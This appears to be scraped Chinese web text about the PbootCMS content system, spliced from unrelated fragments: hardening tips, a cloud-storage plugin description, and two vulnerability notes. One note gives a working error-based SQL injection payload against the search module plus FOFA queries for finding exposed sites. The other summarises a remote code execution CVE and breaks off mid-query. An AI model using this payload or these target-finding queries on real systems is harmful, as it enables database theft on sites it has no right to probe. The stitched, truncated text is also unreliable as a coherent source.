1.不建议随时更新不懂的小白，在安装后不建议点击更新。 2.及时修改后台账号和密码许多网站被黑就是由于没有修改默认地址和用户名密码等。 3.及时开启防跨站特别是一个服务器、同一个域名下部署有多个网站情况，建议开启！ 4.安装防火墙不管是系统自带还是另外购买的商业版防火墙，你总得有一个防火墙在防御网络的攻击，特别提请注意注意CC攻击。5. 修改默认后台入口admin.php6.修改数据库的默认路径7.不要使用小厂商的云服务器、VPS、小米主机等推荐腾讯云、阿里云等大厂服务器：

漏洞描述i⭐PbootCMS搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息漏洞影响s✅PbootCMS空间测绘d⭕FOFA：app="PBOOTCMS"漏洞复现搜索框页面为✅Payload为/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)我的个人

特别注意事项URL请填写全地址，如下图是阿里云OSS提供的Bucket域名，请填写完整这个域名。插件介绍增加图片上传到七牛云和阿里云OSS，可选择启用。图片上传、编辑器上传图片均已接入云存储。有图有真相：可能出现的问题及解决方案PbootCms中轮播多图的字段大小是1000，在使用了云存储后，图片的URL会变得较长，如果需要在轮播多图中插入超过10张图片的话，可能会出现图片丢失的情况。解决方法就是将数据库中ay_content表中的pics字段调大一点即可。（见下图）当然这个是比较极端的情况，如果你没有这么多的图片上传需求，请无视。注意事项1、该插件基于PbootCmsV3.0.2开发。压缩包

漏洞名称：PbootCMS3.1.2远程代码执行漏洞（CVE-2022-32417）EnglishName：PbootCMS3.1.2RCE(CVE-2022-32417)CVSScore:9.0漏洞描述：PbootCMS是PbootCMS个人开发者的一款使用PHP语言开发的开源企业建站内容管理系统（CMS）。PbootCMS3.1.2版本中存在安全漏洞，攻击者可通过该漏洞引发代码远程执行。漏洞影响：PbootCMS3.1.2版本中存在安全漏洞，攻击者可通过该漏洞引发代码远程执行。FOFA查询语句（点击直接查看结果）：banner=“Set-Cookie:pbootsystem=”||head